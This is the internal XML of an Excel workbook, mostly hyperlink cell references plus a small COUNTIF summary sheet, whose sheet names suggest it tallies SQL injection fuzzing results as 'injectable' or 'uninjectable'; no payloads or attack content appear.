    <hyperlink ref="C492" r:id="rId490" xr:uid="{C470F789-3E3A-0349-80C3-965A79F8318D}"/>
    <hyperlink ref="C493" r:id="rId491" xr:uid="{2EF968F7-0128-BE40-8F2B-7165ED655A8B}"/>
    <hyperlink ref="C494" r:id="rId492" xr:uid="{7EDBAB1E-C781-EC42-B02E-323296D765D2}"/>
    <hyperlink ref="C495" r:id="rId493" xr:uid="{61B3F9FA-BC7D-6645-A2C1-B0B9234C0621}"/>
    <hyperlink ref="C496" r:id="rId494" xr:uid="{077C5B89-E4DF-8648-9714-233690C4358E}"/>
    <hyperlink ref="C497" r:id="rId495" xr:uid="{57123FCD-04C4-6645-BDF4-65BE80C10495}"/>
    <hyperlink ref="C498" r:id="rId496" xr:uid="{4CA24E09-FCAB-9E4A-ADBD-5046BB646593}"/>
    <hyperlink ref="C499" r:id="rId497" xr:uid="{7ECAC7DA-CC5A-EA42-95FB-C0ACBB09F9C1}"/>
    <hyperlink ref="C500" r:id="rId498" xr:uid="{01C263C6-8B90-7948-BEDC-4B249C7BC3C1}"/>
    <hyperlink ref="C501" r:id="rId499" xr:uid="{BCDF49FC-BB93-5140-B990-FD69DA7BD561}"/>
    <hyperlink ref="C502" r:id="rId500" xr:uid="{B940B6C9-8CFF-2947-9365-8C839967F0FB}"/>
    <hyperlink ref="C503" r:id="rId501" xr:uid="{75CC495D-594B-CD43-BC33-4AE13AA80B99}"/>
    <hyperlink ref="C504" r:id="rId502" xr:uid="{94DCE9C8-3DD9-E642-8A6D-F22228D1A89F}"/>
    <hyperlink ref="C505" r:id="rId503" xr:uid="{E773C712-2AF6-2C4D-9D31-86590714C5F2}"/>
    <hyperlink ref="C506" r:id="rId504" xr:uid="{0486DCE8-0608-B449-8D3E-FADEBD7B6F41}"/>
    <hyperlink ref="C507" r:id="rId505" xr:uid="{05492464-310D-8E4E-B078-F72D67B8BF05}"/>
    <hyperlink ref="C508" r:id="rId506" xr:uid="{AD8B5B65-4973-EA4A-8730-13DF86F0DF7F}"/>
    <hyperlink ref="C509" r:id="rId507" xr:uid="{1E9A7F7F-7247-284B-B4E0-3F19D0CFEA30}"/>
    <hyperlink ref="C510" r:id="rId508" xr:uid="{76D42798-65B2-564A-A083-1F734D83DEC7}"/>
    <hyperlink ref="C511" r:id="rId509" xr:uid="{93275DD6-D2CD-0E43-8A98-E2BE1257629F}"/>
    <hyperlink ref="C512" r:id="rId510" xr:uid="{EC3A5343-0682-EA4E-BA02-75C05EA098CF}"/>
    <hyperlink ref="C513" r:id="rId511" xr:uid="{E6EA58DE-4DAA-C94D-9094-BF80F10AB807}"/>
    <hyperlink ref="C514" r:id="rId512" xr:uid="{5638B2A2-4B8E-2246-A031-716CDFF1B04F}"/>
    <hyperlink ref="C515" r:id="rId513" xr:uid="{0CE33616-81FF-B24A-BE01-DBE05BAA54E0}"/>
    <hyperlink ref="C516" r:id="rId514" xr:uid="{815210B9-45FF-1044-A7FE-36220CB39F87}"/>
    <hyperlink ref="C517" r:id="rId515" xr:uid="{ADB4C8DD-EFDE-864C-8C9A-58DEA9A4AE2A}"/>
    <hyperlink ref="C518" r:id="rId516" xr:uid="{2EC2AA57-B43F-1A48-BE51-88FB0B33AC0B}"/>
    <hyperlink ref="C519" r:id="rId517" xr:uid="{EAC43B2F-4103-D744-90C0-94C3A45A2E3B}"/>
    <hyperlink ref="C520" r:id="rId518" xr:uid="{495785FE-FCBC-E242-98B1-7F0F6ACCFA98}"/>
    <hyperlink ref="C521" r:id="rId519" xr:uid="{E1C4EE47-1487-8049-8864-FB4D0C0F0319}"/>
    <hyperlink ref="C522" r:id="rId520" xr:uid="{28C7233E-3E46-064C-82CD-BD37D2F4DED7}"/>
    <hyperlink ref="C523" r:id="rId521" xr:uid="{5E8FCFAA-E433-6C49-A863-4E25FAD1DB3C}"/>
    <hyperlink ref="C524" r:id="rId522" xr:uid="{B98ACDD9-3081-F449-9EB7-353E11199663}"/>
    <hyperlink ref="C525" r:id="rId523" xr:uid="{AB72D86B-ACDF-BC44-9692-322CBD30B29B}"/>
    <hyperlink ref="C526" r:id="rId524" xr:uid="{2EC2D22E-9827-244D-9D6C-50B75FF9C2BF}"/>
    <hyperlink ref="C527" r:id="rId525" xr:uid="{A090E177-0A94-DD48-A4A6-D43C8167EDE6}"/>
    <hyperlink ref="C528" r:id="rId526" xr:uid="{402B10A5-D1A4-9E45-8238-93391281FC56}"/>
    <hyperlink ref="C529" r:id="rId527" xr:uid="{B6C5CE13-663A-7E48-804F-AE31E9A991BA}"/>
    <hyperlink ref="C530" r:id="rId528" xr:uid="{72A285AA-09E3-8D44-8904-8C1CF6EA3735}"/>
    <hyperlink ref="C531" r:id="rId529" xr:uid="{01B3BD22-FD7D-E245-A3C9-C952E536F00E}"/>
    <hyperlink ref="C532" r:id="rId530" xr:uid="{F4F6FE84-84CF-5A4E-92E6-FD9BB9D166C9}"/>
    <hyperlink ref="C533" r:id="rId531" xr:uid="{774BEC01-7CEA-9F47-9221-4BD4A2A573C2}"/>
    <hyperlink ref="C534" r:id="rId532" xr:uid="{6464B24C-58AF-2645-8F41-63F964A85CBC}"/>
    <hyperlink ref="C535" r:id="rId533" xr:uid="{6EF2F82F-DE5D-5E42-976D-E77EA69E3023}"/>
    <hyperlink ref="C536" r:id="rId534" xr:uid="{F951A48F-5FF3-6F46-B307-5440DA6D6629}"/>
    <hyperlink ref="C537" r:id="rId535" xr:uid="{D7545F65-0F44-3744-9882-2FB840ABEFC2}"/>
    <hyperlink ref="C538" r:id="rId536" xr:uid="{095702FE-8377-7549-80E1-39828469CBEF}"/>
    <hyperlink ref="C539" r:id="rId537" xr:uid="{E472CBD4-B840-F541-AB5E-6A422DCA091B}"/>
    <hyperlink ref="C540" r:id="rId538" xr:uid="{86921245-A2E9-1443-AA90-60322741C3BF}"/>
    <hyperlink ref="C541" r:id="rId539" xr:uid="{545A8271-252D-7B4A-B03E-00598D81A358}"/>
    <hyperlink ref="C542" r:id="rId540" xr:uid="{346FCC9F-42C2-634B-97B8-4F8A5A0ED02B}"/>
    <hyperlink ref="C543" r:id="rId541" xr:uid="{71B28EFB-006A-B842-8012-E2DE527CF279}"/>
    <hyperlink ref="C544" r:id="rId542" xr:uid="{CDA80A41-329D-3E49-BC6F-92266C6FAA76}"/>
    <hyperlink ref="C545" r:id="rId543" xr:uid="{2563DEFD-DA14-B243-8C5E-85E6951CD7CC}"/>
    <hyperlink ref="C546" r:id="rId544" xr:uid="{7A659DF6-85C5-6047-A36B-C6EC69A09AD0}"/>
    <hyperlink ref="C547" r:id="rId545" xr:uid="{E1E267D7-04E0-664A-ADDA-2AE02B7846A2}"/>
    <hyperlink ref="C548" r:id="rId546" xr:uid="{1CCE0471-6792-B048-B1E2-0A9228AA53E6}"/>
    <hyperlink ref="C549" r:id="rId547" xr:uid="{ED42D48C-5E02-2543-BE9A-F637D1DFB061}"/>
    <hyperlink ref="C550" r:id="rId548" xr:uid="{C2B1C040-A6A9-8E4E-9A95-5E44D5D56DA2}"/>
    <hyperlink ref="C551" r:id="rId549" xr:uid="{29252364-2455-1D4F-BF06-E46EA6E81FBF}"/>
    <hyperlink ref="C552" r:id="rId550" xr:uid="{968C7976-8669-1346-9544-CF3F1E3D5247}"/>
    <hyperlink ref="C553" r:id="rId551" xr:uid="{A13E7FC9-8AEA-5545-865F-A0DDB06F0B49}"/>
    <hyperlink ref="C554" r:id="rId552" xr:uid="{2209A8B2-74B2-AC4C-B604-9C518B5BE26B}"/>
    <hyperlink ref="C555" r:id="rId553" xr:uid="{7F108826-3EEA-CD40-AA61-6390A7D8C383}"/>
    <hyperlink ref="C556" r:id="rId554" xr:uid="{2D34D718-EDCB-8549-8AA6-3A32A446716D}"/>
    <hyperlink ref="C557" r:id="rId555" xr:uid="{2D6201CB-44FB-2749-908F-15F3C0902DAF}"/>
    <hyperlink ref="C558" r:id="rId556" xr:uid="{C18EB212-0CCD-524B-90FE-F02675DA436D}"/>
    <hyperlink ref="C559" r:id="rId557" xr:uid="{C5156149-E422-9943-90C3-801E6FDBD299}"/>
    <hyperlink ref="C560" r:id="rId558" xr:uid="{ECC4DC73-5979-DC4D-83BA-90279F061E5C}"/>
    <hyperlink ref="C561" r:id="rId559" xr:uid="{34D8801F-E540-844E-A0D4-BB2B81ECA3FA}"/>
    <hyperlink ref="C562" r:id="rId560" xr:uid="{A20652F9-33D9-DB43-82EE-F3FD34397F6D}"/>
    <hyperlink ref="C563" r:id="rId561" xr:uid="{068C86E8-B4A6-3249-AEE7-600F024EE37B}"/>
    <hyperlink ref="C564" r:id="rId562" xr:uid="{5975FF67-02E9-6C4C-A9E3-E6243BAF6AD9}"/>
    <hyperlink ref="C565" r:id="rId563" xr:uid="{5396DF6F-7F6C-464F-948A-3C9A8D73F4B9}"/>
    <hyperlink ref="C566" r:id="rId564" xr:uid="{D31BDE8D-CDB3-154B-96E6-C72DEA0ADA92}"/>
    <hyperlink ref="C567" r:id="rId565" xr:uid="{F955B614-515C-BD4D-8D4E-DD3BC060BE1E}"/>
    <hyperlink ref="C568" r:id="rId566" xr:uid="{CF4CCF00-602B-C847-AD1F-145B7632308B}"/>
    <hyperlink ref="C569" r:id="rId567" xr:uid="{543A24B6-1009-654A-997D-726DBAA74EC4}"/>
    <hyperlink ref="C570" r:id="rId568" xr:uid="{C9F35476-1F8B-9C4B-94D4-C93DE11FE868}"/>
    <hyperlink ref="C571" r:id="rId569" xr:uid="{C1A1CA32-FCAA-2243-8E66-44B740EA1FA4}"/>
    <hyperlink ref="C572" r:id="rId570" xr:uid="{CFB08C53-A8F4-AE41-BDA7-EFB814E42A47}"/>
    <hyperlink ref="C573" r:id="rId571" xr:uid="{E3018FA0-E2C7-4F4C-A0BC-62D41C0D7BDA}"/>
    <hyperlink ref="C574" r:id="rId572" xr:uid="{A46BFCDB-FB67-084D-96B2-23C472DB4324}"/>
    <hyperlink ref="C575" r:id="rId573" xr:uid="{3E894C7C-A7BC-2E47-A011-F4873911E45D}"/>
    <hyperlink ref="C576" r:id="rId574" xr:uid="{169604A4-15CA-CE43-8415-02C580BFD1C2}"/>
    <hyperlink ref="C577" r:id="rId575" xr:uid="{D700937B-31C9-7C4E-BAC1-334BB0D35302}"/>
    <hyperlink ref="C578" r:id="rId576" xr:uid="{3F8A06C3-7EC0-8444-A316-AEB2BF56DD87}"/>
    <hyperlink ref="C579" r:id="rId577" xr:uid="{4157DC6F-2067-8843-A6D7-FF42E53DC5CB}"/>
    <hyperlink ref="C580" r:id="rId578" xr:uid="{97FD588D-A043-8D40-BA18-87098CCE954D}"/>
    <hyperlink ref="C581" r:id="rId579" xr:uid="{27613844-B40A-A84F-B9FE-6947AF35026A}"/>
    <hyperlink ref="C582" r:id="rId580" xr:uid="{C9083C26-ABD8-8E4D-B2BE-2DE468DAB118}"/>
    <hyperlink ref="C583" r:id="rId581" xr:uid="{63227326-90B0-E84A-B161-9F7E0CBD2789}"/>
    <hyperlink ref="C584" r:id="rId582" xr:uid="{622C462A-9C7D-914E-81F1-7986945E9360}"/>
    <hyperlink ref="C585" r:id="rId583" xr:uid="{AA66A5B4-F6F2-3F4D-B330-E5CC8429ECF0}"/>
    <hyperlink ref="C586" r:id="rId584" xr:uid="{820C2DB8-5CCC-7E4C-9B09-B3161D703DC4}"/>
    <hyperlink ref="C587" r:id="rId585" xr:uid="{A7374DEA-E920-AF49-9BD3-4FFBD610DF06}"/>
    <hyperlink ref="C588" r:id="rId586" xr:uid="{552ED9D2-4793-2C49-A39A-1C1B80054860}"/>
    <hyperlink ref="C589" r:id="rId587" xr:uid="{0B1DC38B-C6FC-3D4F-BF52-F294151D70E1}"/>
    <hyperlink ref="C590" r:id="rId588" xr:uid="{404BE8B1-93CD-994A-80F8-1A347930883A}"/>
    <hyperlink ref="C591" r:id="rId589" xr:uid="{1622E8FD-EEF9-BF4B-996C-51936C16E0B0}"/>
    <hyperlink ref="C592" r:id="rId590" xr:uid="{848EEA8D-217F-544E-A859-478751E532DE}"/>
    <hyperlink ref="C593" r:id="rId591" xr:uid="{467E7213-E3B0-604C-BC0C-E0CAF90E4609}"/>
    <hyperlink ref="C169" r:id="rId592" xr:uid="{DA3651B7-7DEE-3C4E-81C3-8959FA10E988}"/>
    <hyperlink ref="C594" r:id="rId593" xr:uid="{F21683D3-57F3-3B4F-8443-E540A62E2DD7}"/>
    <hyperlink ref="C595" r:id="rId594" xr:uid="{A05951D0-7E90-884C-84CB-7408ABB74439}"/>
    <hyperlink ref="C596" r:id="rId595" xr:uid="{18AC5D2C-9E31-B542-A7FB-587AB17FED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2752-C53B-D042-B0A8-81C4741FDA4D}">
  <dimension ref="A1:B3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s="15" t="s">
        <v>15</v>
      </c>
      <c r="B1" s="15" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A2" s="15">
        <v>1</v>
      </c>
      <c r="B2" s="15">
        <f>COUNTIF(Sheet1!F2:F602,1)</f>
        <v>595</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3" s="15">
        <v>2</v>
      </c>
      <c r="B3" s="15">
        <f>COUNTIF(Sheet1!F2:F602,2)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injectable</vt:lpstr>
      <vt:lpstr>uninjectable</vt:lpstr>
      <vt:lpstr>conclusion</vt:lpstr>
      <vt:lpstr>Sheet1!SQLI_2_fuzzed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2020-12-08T10:19:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-09T14:32:32Z</dcterms:modified>
</cp:coreProperties>
</file>